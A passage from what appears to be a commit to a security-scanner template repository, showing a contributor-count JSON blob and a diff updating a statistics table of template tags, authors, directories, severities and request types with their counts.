(sillydaddy)","count":1},{"name":"exploitation","count":1},{"name":"zinminphy0","count":1},{"name":"kurohost","count":1},{"name":"phyr3wall","count":1},{"name":"coldfish","count":1},{"name":"andirrahmani1","count":1},{"name":"arall","count":1},{"name":"0ut0fb4nd","count":1},{"name":"s1r1u5_","count":1},{"name":"thezakman","count":1},{"name":"manasmbellani","count":1},{"name":"andysvints","count":1},{"name":"rschio","count":1},{"name":"dawid-czarnecki","count":1},{"name":"izn0u","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"yavolo","count":1},{"name":"b0rn2r00t","count":1},{"name":"mesaglio","count":1},{"name":"ilovebinbash","count":1},{"name":"ok_bye_now","count":1},{"name":"whynotke","count":1},{"name":"xstp","count":1},{"name":"0xteles","count":1},{"name":"aresx","count":1},{"name":"skylark-lab","count":1},{"name":"d4vy","count":1},{"name":"patralos","count":1},{"name":"kiks7","count":1},{"name":"rojanrijal","count":1},{"name":"0xrod","count":1},{"name":"sicksec","count":1},{"name":"nerrorsec","count":1},{"name":"miroslavsotak","count":1},{"name":"schniggie","count":1},{"name":"elmahdi","count":1},{"name":"yashgoti","count":1},{"name":"kaizensecurity","count":1},{"name":"intx0x80","count":1},{"name":"thevillagehacker","count":1},{"name":"pratik khalane","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"jbaines-r7","count":1},{"name":"geraldino2","count":1},{"name":"alevsk","count":1},{"name":"co0nan","count":1},{"name":"becivells","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ldionmarcil","count":1},{"name":"f1she3","count":1},{"name":"regala_","count":1},{"name":"thebinitghimire","count":1},{"name":"shreyapohekar","count":1},{"name":"0xceba","count":1},{"name":"vzamanillo","count":1},{"name":"wlayzz","count":1},{"name":"ringo","count":1},{"name":"luskabol","count":1},{"name":"0xtavian","count":1},{"name":"aaronchen0","count":1},{"name":"myztique","count":1},{"name":"pudsec","count":1},{"name":"shelld3v","count":1},{"name":"duty_1g","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"compr00t","count":1},{"name":"berkdusunur","count":1},{"name":"jas37","count":1},{"name":"igibanez","count":1},{"name":"mhdsamx","count":1},{"name":"0h1in9e","count":1},{"name":"0xd0ff9","count":1},{"name":"notsoevilweasel","count":1},{"name":"d0rkerdevil","count":1},{"name":"kareemse1im","count":1},{"name":"0xceeb","count":1},{"name":"blckraven","count":1},{"name":"micha3lb3n","count":1},{"name":"dievus","count":1},{"name":"manuelbua","count":1},{"name":"streetofhackerr007","count":1},{"name":"fopina","count":1},{"name":"francescocarlucci","count":1},{"name":"kailashbohara","count":1},{"name":"act1on3","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"amnotacat","count":1},{"name":"fq_hsu","count":1},{"name":"brenocss","count":1},{"name":"3th1c_yuk1","count":1},{"name":"mrcl0wnlab","count":1},{"name":"qlkwej","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"_darrenmartyn","count":1},{"name":"furkansayim","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"elouhi","count":1},{"name":"tim_koopmans","count":1},{"name":"apt-mirror","count":1},{"name":"bughuntersurya","count":1},{"name":"justmumu","count":1},{"name":"luqman","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"absshax","count":1},{"name":"j33n1k4","count":1},{"name":"borna nematzadeh","count":1},{"name":"zandros0","count":1},{"name":"opencirt","count":1},{"name":"brabbit10","count":1},{"name":"evan rubinstien","count":1},{"name":"2rs3c","count":1},{"name":"retr0","count":1},{"name":"thesubtlety","count":1},{"name":"jeya seelan","count":1},{"name":"daviey","count":1},{"name":"dhiyaneshdki","count":1},{"name":"hanlaomo","count":1},{"name":"b0yd","count":1},{"name":"rodnt","count":1},{"name":"xshuden","count":1},{"name":"iampritam","count":1},{"name":"retr02332","count":1},{"name":"petruknisme","count":1},{"name":"evolutionsec","count":1},{"name":"jteles","count":1},{"name":"rubina119","count":1},{"name":"udyz","count":1},{"name":"jiheon-dev","count":1},{"name":"harshinsecurity","count":1},{"name":"infosecsanyam","count":1},{"name":"luqmaan hadia","count":1},{"name":"alexrydzak","count":1},{"name":"anon-artist","count":1},{"name":"sickwell","count":1},{"name":"0xh7ml","count":1},{"name":"official_blackhat13","count":1},{"name":"rotemreiss","count":1},{"name":"alperenkesk","count":1},{"name":"prettyboyaaditya","count":1},{"name":"b4uh0lz","count":1},{"name":"fmunozs","count":1},{"name":"nytr0gen","count":1},{"name":"bjhulst","count":1},{"name":"narluin","count":1},{"name":"sec_hawk","count":1},{"name":"ggranjus","count":1},{"name":"pdp","count":1},{"name":"jrolf","count":1},{"name":"daffianfo","count":1},{"name":"mass0ma","count":1},{"name":"florianmaak","count":1},{"name":"exid","count":1},{"name":"breno_css","count":1},{"name":"willd96","count":1},{"name":"toufik-airane","count":1},{"name":"ohlinge","count":1},{"name":"mah3sec_","count":1},{"name":"_c0wb0y_","count":1},{"name":"un-fmunozs","count":1},{"name":"undefl0w","count":1},{"name":"arr0way","count":1},{"name":"furkansenan","count":1},{"name":"zsusac","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"shifacyclewla","count":1},{"name":"veshraj","count":1},{"name":"omarkurt","count":1},{"name":"gboddin","count":1}],"directory":[{"name":"cves","count":1150},{"name":"exposed-panels","count":519},{"name":"vulnerabilities","count":446},{"name":"technologies","count":251},{"name":"exposures","count":203},{"name":"misconfiguration","count":196},{"name":"workflows","count":186},{"name":"token-spray","count":153},{"name":"default-logins","count":94},{"name":"file","count":68},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"miscellaneous","count":23},{"name":"cnvd","count":22},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1183},{"name":"high","count":868},{"name":"medium","count":656},{"name":"critical","count":410},{"name":"low","count":180},{"name":"unknown","count":6}],"types":[{"name":"http","count":3159},{"name":"file","count":68},{"name":"network","count":50},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index c8bc2274d5..bf8962df36 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,1531 +1,1546 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1131 | daffainfo | 559 | cves | 1135 | info | 1165 | http | 3129 | -| panel | 505 | dhiyaneshdk | 415 | exposed-panels | 511 | high | 861 | file | 60 | -| lfi | 457 | pikpikcu | 315 | vulnerabilities | 444 | medium | 649 | network | 49 | -| xss | 356 | pdteam | 262 | technologies | 250 | critical | 405 | dns | 17 | -| wordpress | 349 | geeknik | 177 | exposures | 202 | low | 178 | | | -| exposure | 289 | dwisiswant0 | 165 | misconfiguration | 194 | unknown | 6 | | | -| rce | 285 | princechaddha | 127 | workflows | 186 | | | | | -| cve2021 | 278 | 0x_akoko | 127 | token-spray | 153 | | | | | -| tech | 264 | gy741 | 116 | default-logins | 93 | | | | | -| wp-plugin | 251 | pussycat0x | 107 | takeovers | 67 | | | | | -| cve2020 | 196 | madrobot | 65 | file | 60 | | | | | -| | 187 | zzeitlin | 64 | iot | 38 | | | | | -| token-spray | 153 | idealphase | 44 | network | 35 | | | | | +| cve | 1146 | daffainfo | 560 | cves | 1150 | info | 1183 | http | 3159 | +| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 868 | file | 68 | +| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 656 | network | 50 | +| xss | 361 | pdteam | 262 | technologies | 251 | critical | 410 | dns | 17 | +| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | +| exposure | 292 | dwisiswant0 | 167 | misconfiguration | 196 | unknown | 6 | | | +| rce | 288 | princechaddha | 130 | workflows | 186 | | | | | +| cve2021 | 282 | 0x_akoko | 128 | token-spray | 153 | | | | | +| tech | 265 | gy741 | 117 | default-logins | 94 | | | | | +| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | +| cve2020 | 196 | madrobot | 65 | takeovers | 67 | | | | | +| | 188 | zzeitlin | 64 | iot | 38 | | | | | +| token-spray | 153 | idealphase | 46 | network | 35 | | | | | | joomla | 131 | gaurang | 42 | miscellaneous | 23 | | | | | -| apache | 120 | philippedelteil | 36 | cnvd | 22 | | | | | -| cve2018 | 119 | ritikchaddha | 32 | dns | 17 | | | | | -| cve2019 | 118 | adam crosser | 30 | fuzzing | 11 | | | | | -| config | 117 | ice3man | 26 | headless | 6 | | | | | +| config | 126 | philippedelteil | 36 | cnvd | 22 | | | | | +| cve2018 | 120 | ritikchaddha | 35 | dns | 17 | | | | | +| apache | 120 | adam crosser | 30 | fuzzing | 12 | | | | | +| cve2019 | 117 | ice3man | 26 | headless | 6 | | | | | | cve2010 | 111 | organiccrap | 24 | ssl | 4 | | | | | -| default-login | 107 | c-sh0 | 23 | | | | | | | -| iot | 102 | ffffffff0x | 22 | | | | | | | -| unauth | 98 | righettod | 18 | | | | | | | +| default-login | 108 | c-sh0 | 23 | | | | | | | +| unauth | 102 | ffffffff0x | 22 | | | | | | | +| iot | 102 | righettod | 18 | | | | | | | | oast | 96 | cckuailong | 17 | | | | | | | -| login | 84 | for3stco1d | 15 | | | | | | | -| takeover | 73 | pr3r00t | 15 | | | | | | | -| token | 72 | sheikhrishad | 15 | | | | | | | -| redirect | 66 | techbrunchfr | 14 | | | | | | | -| cve2017 | 63 | r3dg33k | 14 | | | | | | | -| misconfig | 63 | milo2012 | 14 | | | | | | | -| sqli | 61 | sharath | 13 | | | | | | | +| login | 85 | akincibor | 16 | | | | | | | +| takeover | 73 | for3stco1d | 15 | | | | | | | +| token | 72 | pr3r00t | 15 | | | | | | | +| redirect | 68 | sheikhrishad | 15 | | | | | | | +| misconfig | 65 | milo2012 | 14 | | | | | | | +| cve2017 | 63 | techbrunchfr | 14 | | | | | | | +| sqli | 62 | r3dg33k | 14 | | | | | | | +| ssrf | 60 | sharath | 13 | | | | | | | | file | 60 | sullo | 12 | | | | | | | -| ssrf | 59 | suman_kar | 12 | | | | | | | -| network | 52 | akincibor | 12 | | | | | | | -| oracle | 48 | wdahlenb | 11 | | | | | | | -| router | 47 | melbadry9 | 11 | | | | | | | -| cve2022 | 47 | cyllective | 11 | | | | | | | -| cve2016 | 45 | hackergautam | 10 | | | | | | | -| disclosure | 45 | nadino | 10 | | | | | | | -| wp | 44 | alph4byt3 | 10 | | | | | | | -| plugin | 40 | random_robbie | 10 | | | | | | | -| cve2014 | 37 | meme-lord | 10 | | | | | | | -| cve2015 | 36 | johnk3r | 10 | | | | | | | -| auth-bypass | 36 | emadshanab | 9 | | | | | | | -| cisco | 35 | that_juan_ | 8 | | | | | | | -| google | 35 | iamthefrogy | 8 | | | | | | | -| authenticated | 34 | aashiq | 8 | | | | | | | -| logs | 33 | zh | 8 | | | | | | | -| atlassian | 31 | 0x240x23elu | 7 | | | | | | | -| injection | 30 | randomstr1ng | 7 | | | | | | | -| listing | 30 | dogasantos | 7 | | | | | | | -| traversal | 29 | techryptic (@tech) | 7 | | | | | | | -| jira | 29 | divya_mudgal | 7 | | | | | | | -| devops | 28 | edoardottt | 7 | | | | | | | -| kubernetes | 25 | logicalhunter | 7 | | | | | | | -| generic | 25 | kophjager007 | 7 | | | | | | | -| springboot | 24 | harshbothra_ | 7 | | | | | | | -| oss | 24 | oppsec | 7 | | | | | | | -| cms | 24 | dr_set | 7 | | | | | | | -| adobe | 24 | rootxharsh | 6 | | | | | | | -| proxy | 22 | evan rubinstein | 6 | | | | | | | -| cnvd | 22 | pentest_swissky | 6 | | | | | | | -| sap | 22 | __fazal | 6 | | | | | | | +| cve2022 | 58 | suman_kar | 12 | | | | | | | +| network | 53 | cyllective | 11 | | | | | | | +| oracle | 50 | wdahlenb | 11 | | | | | | | +| router | 49 | melbadry9 | 11 | | | | | | | +| wp | 49 | meme-lord | 10 | | | | | | | +| disclosure | 45 | alph4byt3 | 10 | | | | | | | +| cve2016 | 45 | nadino | 10 | | | | | | | +| plugin | 40 | hackergautam | 10 | | | | | | | +| cve2014 | 37 | johnk3r | 10 | | | | | | | +| auth-bypass | 37 | random_robbie | 10 | | | | | | | +| cve2015 | 36 | emadshanab | 9 | | | | | | | +| google | 36 | dogasantos | 9 | | | | | | | +| cisco | 35 | zh | 8 | | | | | | | +| authenticated | 35 | iamthefrogy | 8 | | | | | | | +| logs | 33 | that_juan_ | 8 | | | | | | | +| atlassian | 32 | aashiq | 8 | | | | | | | +| injection | 30 | oppsec | 7 | | | | | | | +| listing | 30 | divya_mudgal | 7 | | | | | | | +| jira | 30 | harshbothra_ | 7 | | | | | | | +| traversal | 29 | dr_set | 7 | | | | | | | +| devops | 28 | kophjager007 | 7 | | | | | | | +| kubernetes | 25 | random-robbie | 7 | | | | | | | +| generic | 25 | edoardottt | 7 | | | | | | | +| oss | 24 | techryptic (@tech) | 7 | | | | | | | +| cms | 24 | randomstr1ng | 7 | | | | | | | +| adobe | 24 | 0x240x23elu | 7 | | | | | | | +| springboot | 24 | logicalhunter | 7 | | | | | | | +| proxy | 22 | pathtaga | 6 | | | | | | | +| sap | 22 | pentest_swissky | 6 | | | | | | | +| cnvd | 22 | caspergn | 6 | | | | | | | +| misc | 21 | iamnoooob | 6 | | | | | | | +| aem | 21 | rootxharsh | 6 | | | | | | | +| vmware | 21 | forgedhallpass | 6 | | | | | | | +| intrusive | 21 | leovalcante | 6 | | | | | | | | debug | 21 | puzzlepeaches | 6 | | | | | | | -| microsoft | 21 | leovalcante | 6 | | | | | | | -| vmware | 21 | iamnoooob | 6 | | | | | | | -| intrusive | 21 | forgedhallpass | 6 | | | | | | | -| misc | 21 | random-robbie | 6 | | | | | | | -| aem | 21 | caspergn | 6 | | | | | | | -| fuzz | 20 | pathtaga | 6 | | | | | | | +| microsoft | 21 | __fazal | 6 | | | | | | | +| fuzz | 20 | evan rubinstein | 6 | | | | | | | | service | 20 | xelkomy | 5 | | | | | | | -| wp-theme | 19 | yanyun | 5 | | | | | | | -| cve2012 | 19 | praetorian-thendrickson | 5 | | | | | | | -| dns | 18 | elsfa7110 | 5 | | | | | | | -| php | 18 | ganofins | 5 | | | | | | | -| manageengine | 18 | panch0r3d | 5 | | | | | | | -| deserialization | 17 | _0xf4n9x_ | 5 | | | | | | | +| wp-theme | 19 | imnightmaree | 5 | | | | | | | +| cve2012 | 19 | _0xf4n9x_ | 5 | | | | | | | +| php | 18 | podalirius | 5 | | | | | | | +| manageengine | 18 | elsfa7110 | 5 | | | | | | | +| dns | 18 | yanyun | 5 | | | | | | | +| tomcat | 17 | panch0r3d | 5 | | | | | | | +| deserialization | 17 | lu4nx | 5 | | | | | | | +| weblogic | 17 | ganofins | 5 | | | | | | | | aws | 17 | joanbono | 5 | | | | | | | -| zoho | 17 | podalirius | 5 | | | | | | | -| tomcat | 17 | lu4nx | 5 | | | | | | | -| weblogic | 17 | imnightmaree | 5 | | | | | | | -| k8s | 16 | tanq16 | 4 | | | | | | | -| ibm | 16 | nodauf | 4 | | | | | | | -| dlink | 15 | tess | 4 | | | | | | | -| cve2011 | 15 | dadevel | 4 | | | | | | | -| gitlab | 15 | wisnupramoedya | 4 | | | | | | | -| struts | 15 | e_schultze_ | 4 | | | | | | | -| jenkins | 15 | defr0ggy | 4 | | | | | | | -| xxe | 14 | dolev farhi | 4 | | | | | | | -| cve2009 | 14 | incogbyte | 4 | | | | | | | -| android | 14 | mr-xn | 3 | | | | | | | -| fileupload | 14 | supras | 3 | | | | | | | -| api | 14 | _generic_human_ | 3 | | | | | | | -| java | 14 | arcc | 3 | | | | | | | -| hp | 14 | f1tz | 3 | | | | | | | -| camera | 13 | emenalf | 3 | | | | | | | -| netsweeper | 12 | whoever | 3 | | | | | | | -| cve2013 | 12 | z3bd | 3 | | | | | | | -| log4j | 12 | 0w4ys | 3 | | | | | | | -| printer | 12 | dudez | 3 | | | | | | | -| rails | 12 | jarijaas | 3 | | | | | | | -| status | 12 | me9187 | 3 | | | | | | | -| cnvd2021 | 11 | skeltavik | 3 | | | | | | | -| netgear | 11 | r3naissance | 3 | | | | | | | -| magento | 11 | mavericknerd | 3 | | | | | | | -| upload | 11 | davidmckennirey | 3 | | | | | | | -| grafana | 11 | lark-lab | 3 | | | | | | | -| ruijie | 11 | impramodsargar | 3 | | | | | | | -| graphql | 11 | yuzhe-zhang-0 | 3 | | | | | | | -| backup | 10 | johnjhacking | 3 | | | | | | | -| nginx | 10 | binaryfigments | 3 | | | | | | | -| airflow | 10 | fyoorer | 3 | | | | | | | -| spring | 10 | sushantkamble | 3 | | | | | | | -| glpi | 10 | unstabl3 | 3 | | | | | | | -| dell | 10 | thomas_from_offensity | 3 | | | | | | | +| zoho | 17 | praetorian-thendrickson | 5 | | | | | | | +| ibm | 16 | defr0ggy | 4 | | | | | | | +| k8s | 16 | nodauf | 4 | | | | | | | +| jenkins | 15 | dadevel | 4 | | | | | | | +| dlink | 15 | e_schultze_ | 4 | | | | | | | +| gitlab | 15 | incogbyte | 4 | | | | | | | +| cve2011 | 15 | dolev farhi | 4 | | | | | | | +| struts | 15 | wisnupramoedya | 4 | | | | | | | +| android | 14 | tanq16 | 4 | | | | | | | +| fileupload | 14 | tess | 4 | | | | | | | +| java | 14 | mr-xn | 3 | | | | | | | +| cve2009 | 14 | davidmckennirey | 3 | | | | | | | +| xxe | 14 | yash anand @yashanand155 | 3 | | | | | | | +| hp | 14 | emenalf | 3 | | | | | | | +| api | 14 | skeltavik | 3 | | | | | | | +| camera | 13 | r3naissance | 3 | | | | | | | +| ruijie | 13 | github.com/its0x08 | 3 | | | | | | | +| cve2013 | 12 | whoever | 3 | | | | | | | +| rails | 12 | dudez | 3 | | | | | | | +| printer | 12 | supras | 3 | | | | | | | +| status | 12 | arcc | 3 | | | | | | | +| log4j | 12 | andydoering | 3 | | | | | | | +| netsweeper | 12 | yuzhe-zhang-0 | 3 | | | | | | | +| netgear | 11 | f1tz | 3 | | | | | | | +| magento | 11 | gitlab red team | 3 | | | | | | | +| nginx | 11 | impramodsargar | 3 | | | | | | | +| upload | 11 | thomas_from_offensity | 3 | | | | | | | +| lfr | 11 | lark-lab | 3 | | | | | | | +| firewall | 11 | mavericknerd | 3 | | | | | | | +| graphql | 11 | fyoorer | 3 | | | | | | | +| cnvd2021 | 11 | _generic_human_ | 3 | | | | | | | +| airflow | 10 | alifathi-h1 | 3 | | | | | | | +| backup | 10 | shine | 3 | | | | | | | +| jolokia | 10 | h1ei1 | 3 | | | | | | | +| grafana | 10 | me9187 | 3 | | | | | | | +| auth | 10 | z3bd | 3 | | | | | | | +| fortigate | 10 | johnjhacking | 3 | | | | | | | +| dell | 10 | 0w4ys | 3 | | | | | | | | coldfusion | 10 | shifacyclewala | 3 | | | | | | | -| jolokia | 10 | shine | 3 | | | | | | | -| auth | 10 | github.com/its0x08 | 3 | | | | | | | -| github | 9 | yash anand @yashanand155 | 3 | | | | | | | -| lfr | 9 | alifathi-h1 | 3 | | | | | | | -| ftp | 9 | andydoering | 3 | | | | | | | -| webserver | 9 | gitlab red team | 3 | | | | | | | -| zabbix | 9 | fabaff | 2 | | | | | | | -| jndi | 9 | sbani | 2 | | | | | | | -| fortinet | 9 | bing0o | 2 | | | | | | | -| cve2008 | 9 | gal nagli | 2 | | | | | | | -| laravel | 9 | sy3omda | 2 | | | | | | | -| drupal | 9 | koti2 | 2 | | | | | | | -| windows | 9 | swissky | 2 | | | | | | | -| woocommerce | 9 | nuk3s3c | 2 | | | | | | | -| fastjson | 9 | zomsop82 | 2 | | | | | | | -| django | 8 | ambassify | 2 | | | | | | | -| bypass | 8 | dahse89 | 2 | | | | | | | -| wso2 | 8 | k11h-de | 2 | | | | | | | -| confluence | 8 | bp0lr | 2 | | | | | | | -| vcenter | 8 | amsda | 2 | | | | | | | -| iis | 8 | smaranchand | 2 | | | | | | | -| blind | 8 | 0xcrypto | 2 | | | | | | | -| metadata | 8 | socketz | 2 | | | | | | | -| prometheus | 8 | nvn1729 | 2 | | | | | | | -| azure | 8 | foulenzer | 2 | | | | | | | -| phpmyadmin | 8 | taielab | 2 | | | | | | | -| citrix | 8 | hassan khan yusufzai - | 2 | | | | | | | +| glpi | 10 | unstabl3 | 3 | | | | | | | +| spring | 10 | sushantkamble | 3 | | | | | | | +| laravel | 9 | jarijaas | 3 | | | | | | | +| jndi | 9 | binaryfigments | 3 | | | | | | | +| ftp | 9 | sbani | 2 | | | | | | | +| fastjson | 9 | fabaff | 2 | | | | | | | +| github | 9 | manas_harsh | 2 | | | | | | | +| windows | 9 | bsysop | 2 | | | | | | | +| drupal | 9 | ehsahil | 2 | | | | | | | +| zabbix | 9 | cocxanh | 2 | | | | | | | +| cve2008 | 9 | bernardofsr | 2 | | | | | | | +| woocommerce | 9 | ree4pwn | 2 | | | | | | | +| webserver | 9 | redteambrasil | 2 | | | | | | | +| fortinet | 9 | its0x08 | 2 | | | | | | | +| iis | 8 | splint3r7 | 2 | | | | | | | +| prometheus | 8 | huowuzhao | 2 | | | | | | | +| blind | 8 | hahwul | 2 | | | | | | | +| metadata | 8 | convisoappsec | 2 | | | | | | | +| amazon | 8 | z0ne | 2 | | | | | | | +| phpmyadmin | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| azure | 8 | hetroublemakr | 2 | | | | | | | +| confluence | 8 | bing0o | 2 | | | | | | | +| solr | 8 | k11h-de | 2 | | | | | | | +| scada | 8 | 0xprial | 2 | | | | | | | +| audit | 8 | hassan khan yusufzai - | 2 | | | | | | | | | | splint3r7 | | | | | | | | -| amazon | 8 | g4l1t0 | 2 | | | | | | | -| mirai | 8 | paradessia | 2 | | | | | | | -| solr | 8 | huowuzhao | 2 | | | | | | | -| scada | 8 | 0xelkomy | 2 | | | | | | | -| squirrelmail | 7 | manas_harsh | 2 | | | | | | | -| sonicwall | 7 | convisoappsec | 2 | | | | | | | -| exchange | 7 | mohammedsaneem | 2 | | | | | | | -| maps | 7 | y4er | 2 | | | | | | | -| mail | 7 | thardt-praetorian | 2 | | | | | | | -| files | 7 | ree4pwn | 2 | | | | | | | -| ssti | 7 | vavkamil | 2 | | | | | | | -| rconfig | 7 | hackerarpan | 2 | | | | | | | -| python | 7 | r12w4n | 2 | | | | | | | -| kafka | 7 | raesene | 2 | | | | | | | -| kube | 7 | cocxanh | 2 | | | | | | | -| bucket | 7 | cckuakilong | 2 | | | | | | | -| elasticsearch | 7 | redteambrasil | 2 | | | | | | | -| jetty | 6 | dheerajmadhukar | 2 | | | | | | | -| headless | 6 | 0xsapra | 2 | | | | | | | -| lucee | 6 | afaq | 2 | | | | | | | -| magmi | 6 | splint3r7 | 2 | | | | | | | -| docker | 6 | w4cky_ | 2 | | | | | | | -| vpn | 6 | vsh00t | 2 | | | | | | | -| slack | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| firmware | 6 | paperpen | 2 | | | | | | | -| cnvd2020 | 6 | h1ei1 | 2 | | | | | | | -| huawei | 6 | nkxxkn | 2 | | | | | | | -| nodejs | 6 | bananabr | 2 | | | | | | | -| sitecore | 6 | kiblyn11 | 2 | | | | | | | -| backdoor | 6 | kre80r | 2 | | | | | | | -| zimbra | 6 | randomrobbie | 2 | | | | | | | -| jboss | 6 | martincodes-de | 2 | | | | | | | -| druid | 6 | ajaysenr | 2 | | | | | | | -| cobbler | 6 | lotusdll | 2 | | | | | | | -| firebase | 6 | geekby | 2 | | | | | | | -| cicd | 6 | hahwul | 2 | | | | | | | -| go | 6 | bsysop | 2 | | | | | | | -| crlf | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| ofbiz | 6 | x1m_martijn | 2 | | | | | | | -| enum | 6 | ehsahil | 2 | | | | | | | -| rfi | 5 | pxmme1337 | 2 | | | | | | | -| minio | 5 | its0x08 | 2 | | | | | | | -| ruby | 5 | moritz nentwig | 2 | | | | | | | -| gocd | 5 | joeldeleep | 2 | | | | | | | -| keycloak | 5 | 0xprial | 2 | | | | | | | -| solarwinds | 5 | hetroublemakr | 2 | | | | | | | -| kubelet | 5 | danielmofer | 2 | | | | | | | -| ecology | 5 | bernardofsr | 2 | | | | | | | -| storage | 5 | 0xrudra | 2 | | | | | | | -| node | 5 | luci | 2 | | | | | | | -| artica | 5 | udit_thakkur | 2 | | | | | | | -| thinkphp | 5 | z0ne | 2 | | | | | | | -| setup | 5 | gevakun | 2 | | | | | | | -| fatpipe | 5 | 0xsmiley | 2 | | | | | | | -| alibaba | 5 | parth | 2 | | | | | | | -| fpd | 5 | kabirsuda | 1 | | | | | | | -| cache | 5 | whynotke | 1 | | | | | | | -| apisix | 5 | jrolf | 1 | | | | | | | -| symfony | 5 | momen eldawakhly | 1 | | | | | | | -| circarlife | 5 | regala_ | 1 | | | | | | | -| strapi | 5 | rojanrijal | 1 | | | | | | | -| symantec | 5 | act1on3 | 1 | | | | | | | -| dedecms | 5 | ratnadip gajbhiye | 1 | | | | | | | -| error | 5 | alevsk | 1 | | | | | | | -| icewarp | 5 | j33n1k4 | 1 | | | | | | | -| metinfo | 5 | vzamanillo | 1 | | | | | | | -| ssl | 5 | jas37 | 1 | | | | | | | -| zhiyuan | 5 | f1she3 | 1 | | | | | | | -| samsung | 5 | duty_1g | 1 | | | | | | | -| moodle | 5 | 0xteles | 1 | | | | | | | -| opensis | 5 | evan rubinstien | 1 | | | | | | | -| rseenet | 5 | furkansayim | 1 | | | | | | | -| git | 5 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| flink | 4 | ahmetpergamum | 1 | | | | | | | -| smtp | 4 | jbaines-r7 | 1 | | | | | | | -| resin | 4 | v0idc0de | 1 | | | | | | | -| cloud | 4 | coldfish | 1 | | | | | | | -| xmlrpc | 4 | ilovebinbash | 1 | | | | | | | -| nexus | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| cnvd2019 | 4 | hexcat | 1 | | | | | | | -| npm | 4 | alex | 1 | | | | | | | -| hongdian | 4 | cookiehanhoan | 1 | | | | | | | -| voip | 4 | exid | 1 | | | | | | | -| leak | 4 | kaizensecurity | 1 | | | | | | | -| bigip | 4 | luqman | 1 | | | | | | | -| activemq | 4 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| photo | 4 | myztique | 1 | | | | | | | -| beyondtrust | 4 | thebinitghimire | 1 | | | | | | | -| couchdb | 4 | kiks7 | 1 | | | | | | | -| elastic | 4 | harshinsecurity | 1 | | | | | | | -| kevinlab | 4 | official_blackhat13 | 1 | | | | | | | -| microstrategy | 4 | micha3lb3n | 1 | | | | | | | -| stripe | 4 | sec_hawk | 1 | | | | | | | -| paypal | 4 | iampritam | 1 | | | | | | | -| puppet | 4 | anon-artist | 1 | | | | | | | -| hikvision | 4 | orpheus | 1 | | | | | | | -| artifactory | 4 | omarkurt | 1 | | | | | | | -| zyxel | 4 | bad5ect0r | 1 | | | | | | | -| search | 4 | noobexploiter | 1 | | | | | | | -| wcs | 4 | akash.c | 1 | | | | | | | -| prestashop | 4 | rotemreiss | 1 | | | | | | | -| hpe | 4 | aceseven (digisec360) | 1 | | | | | | | -| sonarqube | 4 | 0ut0fb4nd | 1 | | | | | | | -| oa | 4 | alperenkesk | 1 | | | | | | | -| cockpit | 4 | elouhi | 1 | | | | | | | -| tikiwiki | 4 | b0rn2r00t | 1 | | | | | | | -| gogs | 4 | luskabol | 1 | | | | | | | -| ognl | 4 | th3.d1p4k | 1 | | | | | | | -| mailchimp | 4 | dawid-czarnecki | 1 | | | | | | | -| thinkcmf | 4 | kailashbohara | 1 | | | | | | | -| springcloud | 4 | ggranjus | 1 | | | | | | | -| plesk | 4 | b4uh0lz | 1 | | | | | | | -| awstats | 4 | pdp | 1 | | | | | | | -| caucho | 4 | d0rkerdevil | 1 | | | | | | | -| db | 4 | yashanand155 | 1 | | | | | | | -| terramaster | 4 | patralos | 1 | | | | | | | -| microweber | 4 | infosecsanyam | 1 | | | | | | | -| adminer | 4 | luqmaan hadia | 1 | | | | | | | -| cve2007 | 4 | rodnt | 1 | | | | | | | -| panos | 4 | notsoevilweasel | 1 | | | | | | | -| ssh | 4 | bernardo rodrigues | 1 | | | | | | | +| django | 8 | gevakun | 2 | | | | | | | +| wso2 | 8 | raesene | 2 | | | | | | | +| citrix | 8 | parth | 2 | | | | | | | +| vcenter | 8 | smaranchand | 2 | | | | | | | +| bypass | 8 | 0xelkomy | 2 | | | | | | | +| mirai | 8 | koti2 | 2 | | | | | | | +| kafka | 7 | 0xrudra | 2 | | | | | | | +| bucket | 7 | ambassify | 2 | | | | | | | +| firebase | 7 | thardt-praetorian | 2 | | | | | | | +| elasticsearch | 7 | bp0lr | 2 | | | | | | | +| maps | 7 | nvn1729 | 2 | | | | | | | +| vpn | 7 | paperpen | 2 | | | | | | | +| rconfig | 7 | afaq | 2 | | | | | | | +| ssti | 7 | rafaelwdornelas | 2 | | | | | | | +| sonicwall | 7 | vavkamil | 2 | | | | | | | +| exchange | 7 | x1m_martijn | 2 | | | | | | | +| python | 7 | danielmofer | 2 | | | | | | | +| squirrelmail | 7 | dheerajmadhukar | 2 | | | | | | | +| mail | 7 | mohammedsaneem | 2 | | | | | | | +| files | 7 | udit_thakkur | 2 | | | | | | | +| kube | 7 | pxmme1337 | 2 | | | | | | | +| cobbler | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| huawei | 6 | amsda | 2 | | | | | | | +| enum | 6 | 0xcrypto 